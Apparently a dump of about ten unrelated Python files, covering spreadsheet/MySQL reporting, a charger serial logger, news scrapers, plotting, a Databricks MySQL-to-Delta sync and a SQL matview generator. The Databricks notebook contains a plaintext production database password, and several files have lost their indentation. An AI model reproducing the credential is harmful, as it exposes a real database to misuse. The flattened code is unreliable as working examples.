# except Exception as e:
# print(str(e))
# try:
# if 'Delta_Quarter' in wb.sheetnames:
# print('sheet2 exists')
# else:
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Delta_Quarter'
# max_col = (ws2.max_column)
# print(max_col)
# max_row = (ws2.max_row)
# print(max_row)
# sheet_copy = wb.get_sheet_by_name('Quarter_Previous')
# for col in range(2, max_col):
# period = ws2.cell(row=1, column=col).value
# if (period == '2025-Y'):
# break
# for row in range(11, 112):
# value1 = sheet.cell(row=row, column=col).value
# value2 = sheet_copy.cell(row=row, column=col).value
# print(value1, value2)
# if value1 == None or value2 == None:
# pass
# else:
# try:
# val = int(value1) - int(value2)
# ws2.cell(row=row, column=col).value = val
# except ValueError:
# pass
# except Exception as e:
# print(str(e))
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
def match_excel():
    """Compare the DB ExcelMapping table against the labels fetched from
    the 'Annual' worksheet and append any mismatching rows to error_log.txt.

    NOTE(review): relies on names from the enclosing scope (fetch_excel,
    wb, cursor); the error-log file handle is opened per mismatch and never
    closed — confirm intent.
    """
    fetch = fetch_excel('Annual')
    match_fetch = fetch[1]  # presumably a {row-key: label} mapping — TODO confirm against fetch_excel
    print(match_fetch)
    sheet = wb.get_sheet_by_name('Annual')
    max_col = (sheet.max_column)
    print(max_col)
    max_row = (sheet.max_row)
    # Load the expected key -> label mapping from the database.
    db_result = {}
    cursor.execute(
        "select * from ExcelMapping")
    result = cursor.fetchall()
    # print(result)
    for results in result:
        # print(results[0])
        db_result[results[0]] =results[1]
    print(db_result)
    #
    # Compare each DB entry with the sheet labels; log rows that differ.
    for key in db_result:
        if key in match_fetch:
            if (db_result[key] == match_fetch[key]):
                print(key)
                value = db_result[key]
            else:
                print(key)
                f = open("error_log.txt","a")
                f.write("error in row")
                f.write(key)
                value = db_result[key]
                f.write(str(value))
                f.write('\n')
# #
# callproc_script()
# regions("Annual")
# match_excel()
# annual_data()
quarter_data()
# quarter_data()
# wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_country.xlsx')
# print("anual data goessss")
# annual_data()
# delta(wb)
# fetch = fetch_excel('Quarter')
# print(fetch)
except Exception as e:
print("Error while connecting to MySQL",e)
finally:
# closing database connection.
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
|
import serial, sys, io, time
"""
Logger for iMax-B6, Turnigy Accucel-6 and similar 4-button chargers
by Andy Gock
CSV output in format:
time,minutes,voltage,current,charge
If using Windows:
Download wintee: http://code.google.com/p/wintee/
(allows logging to file AND viewing output at the same time)
Run (Win):
del file.txt
python log.py COM14 | wtee file.txt
Run (Linux/Mac):
python log.py /dev/ttyUSB0 | tee file.txt
Press Ctrl+C to terminate.
"""
""" From: https://gist.github.com/7h3rAm/5603718 """
def hexdump(src, length=16, sep='.'):
    """Print a classic hex dump of *src* (a Python 2 byte string).

    length: bytes per output row; sep: placeholder printed for
    non-printable bytes. NOTE: Python 2 only (xrange, print statement,
    str-as-bytes indexing).
    """
    # Map each byte value to its character when printable (repr is 3 chars,
    # e.g. 'a'), otherwise to the separator character.
    FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or sep for x in range(256)])
    lines = []
    for c in xrange(0, len(src), length):
        chars = src[c:c+length]
        hex = ' '.join(["%02x" % ord(x) for x in chars])
        # Insert an extra gap after the 8th byte (24 = 8 bytes * 3 chars).
        if len(hex) > 24:
            hex = "%s %s" % (hex[:24], hex[24:])
        printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or sep) for x in chars])
        # offset: hex-bytes |printable|
        lines.append("%08x: %-*s |%s|\n" % (c, length*3, hex, printable))
    print ''.join(lines)
""" Script starts here """
if len(sys.argv) == 1:
print "Usage:"
print " python " + sys.argv[0] + " SERIAL_PORT"
sys.exit()
try:
ser = serial.Serial(sys.argv[1])
if not ser:
print "Could not open serial port: " + str(sys.argv[1])
sys.exit()
except:
print "Could not open serial port: " + str(sys.argv[1])
sys.exit()
pos = 0
data = "" # binary string
frames_read = 0
time_start = 0
while True:
c = ser.read()
if c == '{':
#print "---\n"
pos = 0
data = ""
data += c
elif c == '}':
pos += 1
data += c
else:
pos += 1
data += c
if c == '}': # End of frame marker
if pos == 75: # Correct frame size
sample = {}
if frames_read == 0:
time_start = time.time()
sample['time'] = 0
else:
sample['time'] = round(time.time() - time_start,3)
frames_read += 1
#hexdump(data)
#continue
# Protocol reverse engineered by
# Ref: http://blog.dest-unreach.be/2012/01/29/imax-b6-charger-protocol-reverse-engineered
sample['current'] = ord(data[33])-128 + (ord(data[34])-128)/100.0
sample['voltage'] = ord(data[35])-128 + (ord(data[36])-128)/100.0
sample['input_voltage'] = ord(data[41])-128 + (ord(data[42])-128)/100.0
sample['charge'] = (ord(data[43])-128)*100 + (ord(data[44])-128)
sample['minutes'] = ord(data[70])-128
#print sample
if frames_read == 1:
# Header row
print "Time(s),Minutes,Voltage(V),Current(A),Charge(mAh)"
print ','.join([
str(sample['time']),
str(sample['minutes']),
str(sample['voltage']),
str(sample['current']),
str(sample['charge'])
])
sys.stdout.flush()
ser.close()
|
def getPrimeFactorsDict(number):
    """Return the prime factorization of *number* as {prime: exponent}.

    Numbers below 2 yield an empty dict.

    Fix: use integer (floor) division instead of true division — `/`
    produces floats in Python 3, which loses precision for inputs larger
    than 2**53 and makes the loop compare int against float.
    """
    current = number
    checking = 2
    factors = dict()
    while checking <= current:
        while current % checking == 0:
            current //= checking  # exact integer division keeps `current` an int
            factors[checking] = factors.get(checking, 0) + 1
        checking += 1
    return factors
def getSmallestDividable(number):
    """Return the smallest positive integer divisible by every integer
    from 1 up to *number* (i.e. the LCM of 1..number)."""
    # Track the highest exponent seen for each prime across 0..number.
    max_powers = dict()
    for candidate in range(number + 1):
        for prime, power in getPrimeFactorsDict(candidate).items():
            if power > max_powers.get(prime, 0):
                max_powers[prime] = power
    # Multiply the primes back together at their maximal exponents.
    result = 1
    for prime, power in max_powers.items():
        result *= prime ** power
    return result
# Script entry: read an integer n from stdin and print the LCM of 1..n.
print(getSmallestDividable(int(input("Input number to find smallest dividable of: "))))
|
import sys
from enum import Enum
class Acid(Enum):
    """Classification of a chemical name by acid type."""
    NON_METAL = 'non-metal acid'
    POLYATOMIC = 'polyatomic acid'
    NOT_ACID = 'not an acid'


def name_acid(text: str) -> Acid:
    """Classify *text*: names of the form 'hydro...ic' are non-metal
    acids, '...ic' without the 'hydro' prefix are polyatomic acids,
    and everything else is not an acid."""
    if text.endswith('ic'):
        return Acid.NON_METAL if text.startswith('hydro') else Acid.POLYATOMIC
    return Acid.NOT_ACID
def main():
    """Read names from stdin (the first line is a count and is skipped)
    and print each name's acid classification."""
    entries = sys.stdin.readlines()[1:]
    for entry in entries:
        print(name_acid(entry.strip()).value)


if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3.5
# -*- coding: utf-8 -*-
# @Time : 18-3-24 下午1:33
# @Author : 无敌小龙虾
# @File : GetNewsClass.py
# @Software: PyCharm
import re
import requests
from bs4 import BeautifulSoup
from lxml import etree
class GetNews:
    """Scrapers for several Chinese news portals (Sina, Sohu, ifeng,
    NetEase, Xinhua, Tencent, The Paper).

    Each Get*News method fetches one article URL and returns a list whose
    element is [title, date-as-YYYYMMDD, cleaned body text]. (The
    GetFengNews flag=0 branch additionally appends the bare title first —
    preserved as-is; confirm whether callers rely on that.)
    """

    def __init__(self):
        # Browser-like request headers so the sites serve the normal page.
        self.headers = {
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
                          '(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8',
        }

    def GetHtml(self, url):
        """Fetch *url* and return its decoded HTML text, or None on failure.

        Fix: the handler previously caught KeyError, which nothing in the
        try block raises; requests.get and raise_for_status raise
        requests.RequestException subclasses, so every network/HTTP error
        escaped uncaught. Catching RequestException restores the intended
        catch-and-log behavior.
        """
        try:
            r = requests.get(url, headers=self.headers, timeout=30)
            r.raise_for_status()  # turn HTTP 4xx/5xx into exceptions
            r.encoding = r.apparent_encoding  # guess charset to avoid mojibake
            return r.text
        except requests.RequestException as e:
            print(e)
            return None

    @staticmethod
    def ChangeTime(time):
        """Normalize a 'YYYY-MM-DD...' prefix to 'YYYYMMDD'."""
        t = time[0:10]
        t1 = t[0:4]
        t2 = t[5:7]
        t3 = t[8:]
        t = t1 + t2 + t3
        return t

    @staticmethod
    def CleanContent(content):
        """Strip HTML tags, newlines/spaces/CRs, and full-width or
        non-breaking spaces from *content*; return the cleaned string."""
        content = re.sub("</?\w+[^>]*>", "", str(content))
        content = re.sub("[\n \r]", "", str(content))
        content = re.sub('[\u3000\xa0]', "", content)
        return content

    def GetSinaNews(self, url, flag=1):
        """Scrape a Sina article; *flag* selects between two page layouts."""
        News = []
        bsobj = self.GetHtml(url)
        select = BeautifulSoup(bsobj, "lxml")
        if flag:
            title = select.find('title').get_text()
            time = select.find('span', {"class": "date"}).get_text()
            content = select.find('div', {"class": "article", "id": "article"})
        else:
            title = select.find('title').get_text()
            time = select.find('span', {"id": "navtimeSource"}).get_text()
            content = select.find('div', {"id": "artibody"})
        title = title.strip()
        time = time.strip()
        time = self.ChangeTime(time)
        content = self.CleanContent(content)
        News.append([title, time, content])
        return News

    def GetSohuNews(self, url):
        """Scrape a Sohu article."""
        News = []
        bsobj = self.GetHtml(url)
        select = etree.HTML(bsobj)
        title = select.xpath(
            '//*[@id="article-container"]/div[2]/div[1]/div[1]/h1')
        title = title[0].text
        time = select.xpath('//*[@id="news-time"]')
        time = time[0].text.strip()
        time = self.ChangeTime(time)
        content = select.xpath('//*[@id="mp-editor"]')
        info = content[0].xpath('string(.)').strip()
        info = self.CleanContent(info)
        # Drop the trailing 14 characters — presumably site boilerplate
        # appended to every article body; confirm against live pages.
        info = info[:-14]
        News.append([title, time, info])
        return News

    def GetFengNews(self, url, flag=1):
        """Scrape an ifeng article; *flag* selects between two page layouts."""
        News = []
        bsobj = self.GetHtml(url)
        if flag:
            select = etree.HTML(bsobj)
            title = select.xpath('//*[@id="artical_topic"]')
            title = title[0].text
            time = select.xpath('//*[@id="artical_sth"]/p/span[1]')
            time = time[0].text.strip()
            content = select.xpath('//*[@id="main_content"]')
            content = content[0].xpath('string(.)').strip()
        else:
            select = BeautifulSoup(bsobj, "lxml")
            title = select.find('h1', {"id": "artical_topic"}).get_text()
            title = title.strip()
            News.append(title)
            time = select.find('div', {"id": "artical_sth"}).get_text()
            time = time.strip()
            content = select.find('div', {"id": "artical_real"}).get_text()
        time = self.ChangeTime(time)
        info = self.CleanContent(content)
        News.append([title, time, info])
        return News

    def GetWangYNews(self, url):
        """Scrape a NetEase (163.com) article."""
        News = []
        bsobj = self.GetHtml(url)
        select = etree.HTML(bsobj)
        title = select.xpath('//*[@id="epContentLeft"]/h1')
        title = title[0].text
        time = select.xpath('//*[@id="epContentLeft"]/div[1]')
        time = time[0].text.strip()
        time = self.ChangeTime(time)
        content = select.xpath('//*[@id="endText"]')
        info = content[0].xpath('string(.)').strip()
        info = self.CleanContent(info)
        News.append([title, time, info])
        return News

    def GetXinHNews(self, url, flag=1):
        """Scrape a Xinhua article; *flag* selects between two page layouts."""
        News = []
        bsobj = self.GetHtml(url)
        if flag:
            select = etree.HTML(bsobj)
            title = select.xpath('/html/body/div[2]/div[3]/div/div[1]')
            title = title[0].text.strip()
            time = select.xpath('/html/body/div[2]/div[3]/div/div[2]/span[1]')
            time = time[0].text.strip()
            content = select.xpath('//*[@id="p-detail"]')
            content = content[0].xpath('string(.)').strip()
        else:
            select = BeautifulSoup(bsobj, "lxml")
            title = select.find('h1', {"id": "title"}).get_text()
            title = title.strip()
            time = select.find('span', {"class": "time"}).get_text()
            time = time.strip()
            content = select.find('div', {"class": "article"})
        time = self.ChangeTime(time)
        info = self.CleanContent(content)
        News.append([title, time, info])
        return News

    def GetTencentNews(self, url):
        """Scrape a Tencent (QQ) article."""
        News = []
        bsobj = self.GetHtml(url)
        select = etree.HTML(bsobj)
        soup = BeautifulSoup(bsobj, 'html.parser')
        title = select.xpath(
            '//*[@id="Main-Article-QQ"]/div/div[1]/div[1]/div[1]/h1')
        title = title[0].text.strip()
        time = soup.find('span', {'class': 'a_time'})
        time = time.text.strip()
        time = self.ChangeTime(time)
        # Body paragraphs are separate <p class="text"> nodes — join them.
        content = soup.find_all('p', {'class': 'text'})
        info = ""
        for son in content:
            info += str(son.text)
        info = self.CleanContent(info)
        News.append([title, time, info])
        return News

    def GetPengPNews(self, url):
        """Scrape a The Paper (thepaper.cn) article."""
        News = []
        bsobj = self.GetHtml(url)
        soup = BeautifulSoup(bsobj, 'html.parser')
        select = etree.HTML(bsobj)
        title = select.xpath('//h1//text()')
        title = title[0].strip()
        # The second <p> of news_about holds the publication timestamp.
        time = soup.find('div', {'class': 'news_about'})
        time = time.find_all('p')[1]
        time = time.text.strip()
        time = self.ChangeTime(time)
        content = soup.find(
            'div', {'class': 'news_txt', 'data-size': 'standard'}).text
        content = self.CleanContent(content)
        News.append([title, time, content])
        return News
|
# -*- coding: utf-8 -*-
"""
箱图
当我们的数据是num_subj*num_var,且有几个诊断组时,我们一般希望把var name作为x,把var value作为y,把诊断组作为hue
来做箱图,以便于观察每个var的组间差异。
此时,用于sns的特殊性,我们要将数据变换未长列的形式。
行数目为:num_subj*num_var。列数目=3,分别是hue,x以及y
input:
data_path=r'D:\others\彦鸽姐\final_data.xlsx'
x_location=np.arange(5,13,1)#筛选数据的列位置
未来改进:封装为类,增加可移植性
@author: lenovo
"""
#==========================================================
# 载入绘图模块
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
#==========================================================
class BoxPlot():
    """Grouped boxplots from a wide spreadsheet of subjects x variables.

    The selected columns are melted into long format — one row per
    (subject, variable) with columns [hue_name, x_name, y_name] — which is
    the shape seaborn.boxplot expects for hue-grouped plots.
    """

    def __init__(self,
                 data_path=r'D:\others\彦鸽姐\final_data.xlsx',
                 x_location=np.arange(5,13,1),
                 x_name='脑区',
                 y_name='reho',
                 hue_name='分组',
                 hue_order=[2,1],
                 if_save_figure=0,
                 figure_name='violin.tiff'):
        # data_path:      Excel file with the raw wide-format data
        # x_location:     column positions (iloc) of the variables to plot
        # x_name/y_name:  axis labels for the long-format columns
        # hue_name:       grouping column name in the spreadsheet
        # hue_order:      order of group levels in the legend
        # if_save_figure: truthy => save the figure to figure_name
        self.data_path=data_path
        self.x_location=x_location
        self.x_name=x_name
        self.y_name=y_name
        self.hue_name=hue_name
        self.hue_order=hue_order
        self.if_save_figure=if_save_figure
        self.figure_name=figure_name

    def data_preparation(self):
        """Load the spreadsheet and reshape the selected columns into long
        format, storing the result in self.data; returns self.

        Rows containing the '[]' placeholder are dropped.

        Fixes: removed the invalid `index=False` keyword (pd.read_excel
        has no such parameter) and replaced `np.str` — an alias removed
        in NumPy 1.24 — with the builtin `str`.
        """
        df = pd.read_excel(self.data_path)
        # Select the variable columns to plot.
        df_selected = df.iloc[:, self.x_location]
        # Treat '[]' placeholders as missing and drop those rows.
        df_selected = pd.DataFrame(df_selected, dtype=str)
        df_selected = df_selected.mask(df_selected == '[]', None, inplace=False)
        df_selected = df_selected.dropna()
        # Everything except the grouping column back to float.
        col_to_float = list(set(list(df_selected.columns)) - set([self.hue_name]))
        df_selected[col_to_float] = pd.DataFrame(df_selected[col_to_float], dtype=np.float32)
        # a=pd.Series(df_selected['HAMD']).str.contains('\d',regex=False)
        # Stack the selected columns into one long value column.
        n_subj, n_col = df_selected.shape
        df_long = pd.DataFrame([])
        for nc in range(n_col):
            df_long = pd.concat([df_long, df_selected.iloc[:, nc]])
        # Variable-name column aligned with the stacked values.
        col_name = list(df_selected.columns)
        col_name_long = [pd.DataFrame([name] * n_subj) for name in col_name]
        col_name_long = pd.concat(col_name_long)
        # Group labels, repeated once per stacked column.
        group = pd.DataFrame([])
        for i in range(n_col):
            group = pd.concat([group, df[self.hue_name].loc[df_selected.index]])
        # Combine into the final (hue, x, y) frame.
        col_name_long.index = df_long.index  # align indexes before concat
        self.data = pd.concat([group, col_name_long, df_long], axis=1)
        # Name the columns.
        self.data.columns = [self.hue_name, self.x_name, self.y_name]
        return self

    def plot(self):
        """Draw the grouped boxplot from the long-format data; optionally
        save the figure. Returns self."""
        self.f, self.ax = plt.subplots()
        # (Re)build the long-format data; also refreshes self.data.
        self.data = self.data_preparation().data
        self.ax = sns.boxplot(x=self.x_name,
                              y=self.y_name,
                              hue=self.hue_name,
                              order=None,
                              hue_order=self.hue_order,
                              data=self.data,
                              palette="Set1",
                              saturation=0.7,
                              width=0.5,
                              fliersize=2,
                              whis=None,
                              notch=False,
                              dodge=True)
        # Optional grid:
        # plt.grid(axis="y",ls='--',c='g')
        # Tick-label size and rotation.
        label_x = self.ax.get_xticklabels()
        label_y = self.ax.get_yticklabels()
        plt.setp(label_x, size=15, rotation=0, horizontalalignment='right')
        plt.setp(label_y, size=15, rotation=0, horizontalalignment='right')
        # save figure
        if self.if_save_figure:
            self.f.savefig(self.figure_name, dpi=300, bbox_inches='tight')
        return self
if __name__ == '__main__':
    # Example run: load the temporal-properties spreadsheet, reshape the
    # first two variable columns to long format, draw the grouped boxplot,
    # and save it at 600 dpi.
    sel = BoxPlot(data_path=r'D:\WorkStation_2018\WorkStation_dynamicFC_V3\Data\results_cluster\results_of_individual\temploral_properties.xlsx',
                  x_location=np.arange(1, 3, 1),
                  hue_name='group',
                  hue_order=[1, 3, 2, 4])
    df = sel.data_preparation()
    sel.plot()
    plt.savefig('MDT.tif', dpi=600)
|
# Databricks notebook source
# Notebook: sync a MySQL table into a Delta Lake table on ADLS Gen2
# (full read -> MERGE upsert -> DELETE of removed rows -> OPTIMIZE).
# Select Libraries => Install New => Select Library Source = "Maven" => Coordinates => Search Packages => Select Maven Central => Search for the package required. Example: mysql-connector-java library => Select the version required => Install
# COMMAND ----------
# dbutils.widgets.removeAll()
# Notebook parameters (Databricks widgets).
# Storage Path in Lake
dbutils.widgets.text("Persisted_File_Path", "/vendeltalakeadw/appian")
# TableName
dbutils.widgets.text("Persisted_Table", "Permit")
dbutils.widgets.text("Merge_Condition", "sink.permit_id = source.permit_id")
# NOTE(review): Merge_Filter is declared but never read below — confirm
# whether it should be appended to the MERGE/DELETE conditions.
dbutils.widgets.text("Merge_Filter", " AND SomeInt < 10")
# COMMAND ----------
# Key-Vault-backed secret scope and ADLS Gen2 account details.
secretScope = "key-vault-secrets"
secretServicePrincipalId = "ServicePrincipalClientId"
secretServicePrincipalKey = "ServicePrincipalKey"
secretTenantId = "TenantId"
adlsFileSystem = "persisted"
adlsAccountName = "vendeltalakeadls"
# COMMAND ----------
# Unmount first so a stale mount doesn't break the remount below.
try:
    dbutils.fs.unmount("/mnt/" + adlsFileSystem)
except Exception as e:
    print("{} already unmounted".format(adlsFileSystem))
# COMMAND ----------
# OAuth client-credentials config for the ADLS Gen2 mount.
configs = {"fs.azure.account.auth.type": "OAuth",
           "fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
           "fs.azure.account.oauth2.client.id": dbutils.secrets.get(scope = secretScope, key = secretServicePrincipalId),
           "fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope = secretScope, key = secretServicePrincipalKey),
           "fs.azure.account.oauth2.client.endpoint": "https://login.microsoftonline.com/" + dbutils.secrets.get(scope = secretScope, key = secretTenantId) + "/oauth2/token"}
# Mount ADLS file system
try:
    dbutils.fs.mount(
        source = "abfss://" + adlsFileSystem + "@" + adlsAccountName +".dfs.core.windows.net/",
        mount_point = "/mnt/" + adlsFileSystem,
        extra_configs = configs)
except Exception as e:
    print("Error: {} already mounted. Run unmount first".format(adlsFileSystem))
# COMMAND ----------
# Source MySQL connection details.
# SECURITY: hard-coded database credentials in source — these should be
# read from the key-vault secret scope used above, and this password
# should be rotated since it has been committed.
jdbcHostname = "prodappianreporting.mysql.database.azure.com"
username = "prodReporting@prodappianreporting"
password = "PXwLgnfbgEAzIJZx"
jdbcDatabase = "appian"
jdbcPort = 3306
# COMMAND ----------
jdbcUrl = "jdbc:mysql://{0}:{1}/{2}".format(jdbcHostname, jdbcPort, jdbcDatabase)
connectionProperties = {
  "user" : username,
  "password" : password,
  "driver" : "com.mysql.jdbc.Driver"
}
# COMMAND ----------
# Read the whole source table through a pushdown subquery and expose it
# as a temp view for the SQL statements below.
tablename = dbutils.widgets.get("Persisted_Table")
tableView = "transview"
pushdown_query = "(select * from {0}) {1}".format(tablename, tablename)
df = spark.read.jdbc(url=jdbcUrl, table=pushdown_query, properties=connectionProperties)
df.createOrReplaceTempView(tableView)
# COMMAND ----------
database = "persisted"
spark.sql("CREATE DATABASE IF NOT EXISTS {DATABASE}".format(DATABASE = database))
persistedFileSystem = "persisted"
mountPath = "/mnt/" + persistedFileSystem + dbutils.widgets.get("Persisted_File_Path") + "/" + tablename
# First run creates the Delta table from the full source snapshot.
spark.sql("""CREATE TABLE IF NOT EXISTS {DATABASE}.{TABLE}
USING DELTA
LOCATION '{PATH}'
AS SELECT * FROM {VIEW_TRANS}""".format(DATABASE = database, TABLE = tablename, PATH = mountPath, VIEW_TRANS = tableView))
condition = dbutils.widgets.get("Merge_Condition")
# Upsert: update matched rows, insert new ones.
spark.sql("""MERGE INTO {DATABASE}.{TABLE} AS sink
USING {View_Trans} AS source
ON {CONDITION}
WHEN MATCHED THEN
  UPDATE SET *
WHEN NOT MATCHED THEN
  INSERT *""".format(DATABASE=database, TABLE=tablename, View_Trans=tableView, CONDITION = condition ))
# Remove rows that no longer exist in the source (full synchronization).
spark.sql("""DELETE FROM {DATABASE}.{TABLE} as sink
WHERE NOT EXISTS (SELECT 1
FROM {View_Trans} as source
where {CONDITION})""".format(DATABASE=database, TABLE=tablename,View_Trans=tableView,CONDITION = condition))
# COMMAND ----------
# optimize
display(spark.sql("optimize {db}.{table}".format(db = database, table = tablename)))
# COMMAND ----------
# Show the Delta table's version history.
display(spark.sql("describe history {DATABASE}.{TABLE}".format(DATABASE = database, TABLE = tablename)))
# COMMAND ----------
# MAGIC %sql
# MAGIC select * from persisted.Permit_Application version as of 1 where permit_application_id = 69201
# MAGIC union
# MAGIC select * from persisted.Permit_Application version as of 2 where permit_application_id = 69201
# MAGIC union
# MAGIC select * from persisted.Permit_Application version as of 3 where permit_application_id = 69201
# COMMAND ----------
# MAGIC %sql
# MAGIC select * from persisted.Permit version as of 3
# MAGIC except
# MAGIC select * from persisted.Permit version as of 1
# COMMAND ----------
|
import time
class StopWatch:
    """Simple wall-clock stopwatch.

    The watch is implicitly started on construction; call stop() to
    record the end, then elapsed_time() to read the duration.
    """

    def __init__(self):
        self.start_time = time.time()  # record the first timestamp
        self.end_time = -1             # -1 sentinel: not stopped yet

    def start(self):
        """(Re)start timing from now and clear any previous stop."""
        self.start_time = time.time()
        self.end_time = -1

    def stop(self):
        """Record the stop timestamp."""
        self.end_time = time.time()

    def elapsed_time(self):
        """Return the seconds between start and stop, rounded to one
        decimal, or None if the watch is running / was never stopped.

        Fix: the original subtracted start_time into self.end_time in
        place, so a second call (or a stop after a restart) returned a
        wrong value; the duration is now computed without mutating state,
        making repeated calls idempotent.
        """
        elapsed = self.end_time - self.start_time
        # Negative means not stopped (end_time sentinel -1) or stopped
        # before the current start — same None result as the original.
        if elapsed < 0:
            return None
        return round(elapsed, 1)
# Demo: the watch starts on construction. Stop ~0.1 s later and print the
# elapsed time; restart and query mid-run (prints None — not stopped yet);
# then stop and print the final reading.
sw = StopWatch ()
time.sleep (0.1)
sw.stop()
print(sw.elapsed_time())
sw.start()
time.sleep(0.2)
print(sw.elapsed_time())
sw.stop()
print(sw.elapsed_time())
# Read an n x m integer matrix; for every cell equal to 0, zero out its
# entire row and column. Zero positions are collected first, then applied,
# so newly written zeros do not cascade.
n11, m1 = map(int, input().split())
a1 = []
b1 = []  # flat list of (row, col) pairs stored as consecutive entries
for i1 in range(n11):
    a1.append(list(map(int, input().split())))
for i1 in range(n11):
    for j1 in range(m1):
        if a1[i1][j1] == 0:
            b1.append(i1)
            b1.append(j1)
for i1 in range(0, len(b1), 2):
    for h1 in range(m1):
        # Fix: was `a[b[i1]][h1] = 0` — `a` and `b` are undefined names
        # (NameError at runtime); the matrix and position list are a1/b1.
        a1[b1[i1]][h1] = 0
    for h1 in range(n11):
        a1[h1][b1[i1 + 1]] = 0
for i1 in range(n11):
    print(*a1[i1])
|
import glob
import json
import os
import sys
from uuid import uuid4
# Usage: python matview_sql_generator.py (from usaspending_api/database_scripts/matview_generator)
# ^--- Will clobber files in usaspending_api/database_scripts/matviews
'''
POSTGRES INDEX FORMAT
CREATE [ UNIQUE ] INDEX [ name ] ON table_name [ USING method ]
( { column_name | ( expression ) } [ COLLATE collation ]
[ opclass ] [ ASC | DESC ] [ NULLS { FIRST | LAST } ] [, ...] )
[ WITH ( storage_parameter = value [, ... ] ) ]
[ WHERE predicate ]
EXAMPLE SQL DESCRIPTION JSON FILE:
{ "final_name": "example_matview",
"matview_sql": [
"SELECT",
" \"transaction_normalized\".\"action_date\",",
" \"transaction_normalized\".\"fiscal_year\",",
" \"awards\".\"type\",",
" \"awards\".\"category\",",
"FROM",
" \"awards\"",
"LEFT OUTER JOIN",
" \"transaction_normalized\" ON (\"awards\".\"latest_transaction_id\" = \"transaction_normalized\".\"id\")",
"WHERE",
" \"transaction_normalized\".action_date >= '2007-10-01'",
"ORDER BY",
" \"action_date\" DESC"
],
"index": {
"name": "<name>",
"columns": [
{
"name": "<col name>",
"order": "DESC|ASC NULLS FIRST|LAST",
"collation": "<collation>",
"opclass": "<opclass"
}
],
"where": "<where clause>",
"unique": true,
"method": "<method>"
}
}
'''
TEMPLATE = {
'create_matview': 'CREATE MATERIALIZED VIEW {} AS\n{};',
'drop_matview': 'DROP MATERIALIZED VIEW IF EXISTS {} CASCADE;',
'rename_matview': 'ALTER MATERIALIZED VIEW {}{} RENAME TO {};',
'cluster_matview': 'CLUSTER VERBOSE {} USING {};',
'refresh_matview': 'REFRESH MATERIALIZED VIEW CONCURRENTLY {} WITH DATA;',
'analyze': 'ANALYZE VERBOSE {};',
'vacuum': 'VACUUM ANALYZE VERBOSE {};',
'create_index': 'CREATE {}INDEX {} ON {} USING {}({}){}{};',
'rename_index': 'ALTER INDEX {}{} RENAME TO {};',
'grant_select': 'GRANT SELECT ON {} TO {};',
}
HEADER = [
'--------------------------------------------------------',
'-- Created using matview_sql_generator.py --',
'-- The SQL definition is stored in a json file --',
'-- Look in matview_generator for the code. --',
'-- --',
'-- DO NOT DIRECTLY EDIT THIS FILE!!! --',
'--------------------------------------------------------',
]
MAX_NAME_LENGTH = 45 # postgres max 63 ascii chars
RANDOM_CHARS = str(uuid4())[:8]
CLUSTERING_INDEX = None
DEST_FOLDER = '../matviews/'
OVERWRITE_FILE = True
def ingest_json(path):
    """Load and return the JSON document stored at *path*."""
    with open(path) as handle:
        return json.load(handle)
def create_index_string(matview_name, index_name, idx):
    """Build a CREATE INDEX statement for *matview_name* from the JSON
    index description *idx*, naming the index *index_name*.

    Side effect: when the description sets "cluster_on_this", the index
    name is recorded in the module-global CLUSTERING_INDEX.
    """
    if idx.get('cluster_on_this', False):
        global CLUSTERING_INDEX
        CLUSTERING_INDEX = index_name

    method = idx.get('method', 'BTREE')  # postgres default access method
    unique = 'UNIQUE ' if idx.get('unique', False) else ''
    where = ' WHERE ' + idx['where'] if idx.get('where', None) else ''
    # Packing btree pages full reduces index size by roughly 10%.
    with_clause = ' WITH (fillfactor = 100)' if method.upper() == 'BTREE' else ''

    columns = []
    for column in idx['columns']:
        # A column name (or expression) is mandatory — KeyError if missing.
        parts = [column['name']]
        # Optional per-column qualifiers, in postgres' expected order;
        # absent ones fall back to postgres defaults.
        for key, prefix in (('order', ''), ('collation', 'COLLATE '), ('opclass', '')):
            if column.get(key, None):
                parts.append(prefix + column[key])
        columns.append(' '.join(parts))

    return TEMPLATE['create_index'].format(
        unique,
        index_name,
        matview_name,
        method,
        ', '.join(columns),
        with_clause,
        where,
    )
def make_sql_header():
    """Return the standard generated-file banner as a one-element list."""
    banner = '\n'.join(HEADER)
    return [banner]
def make_matview_drops(final_matview_name):
    """DROP statements removing any leftover _temp and _old copies of
    the matview from a previous run."""
    suffixes = ('_temp', '_old')
    return [TEMPLATE['drop_matview'].format(final_matview_name + suffix)
            for suffix in suffixes]
def make_matview_create(final_matview_name, sql):
    """CREATE MATERIALIZED VIEW statement building the _temp matview
    from the JSON-supplied *sql* lines."""
    body = '\n'.join(sql)
    return [TEMPLATE['create_matview'].format(final_matview_name + '_temp', body)]
def make_matview_refresh(matview_name):
    """Concurrent REFRESH followed by ANALYZE for *matview_name*."""
    return [TEMPLATE[step].format(matview_name)
            for step in ('refresh_matview', 'analyze')]
def make_indexes_sql(sql_json, matview_name):
    """Build three statement lists from the JSON "indexes" entries:
    CREATE INDEX statements (under *_temp names), renames of existing
    final-name indexes to *_old, and renames of the _temp indexes to
    their final names. Raises on over-long or colliding index names."""
    final_names = []
    create_indexes = []
    rename_old_indexes = []
    rename_new_indexes = []
    for idx in sql_json['indexes']:
        if len(idx['name']) > MAX_NAME_LENGTH:
            raise Exception('Desired index name is too long. Keep under {} chars'.format(MAX_NAME_LENGTH))
        # Random per-run prefix keeps names unique across matview versions.
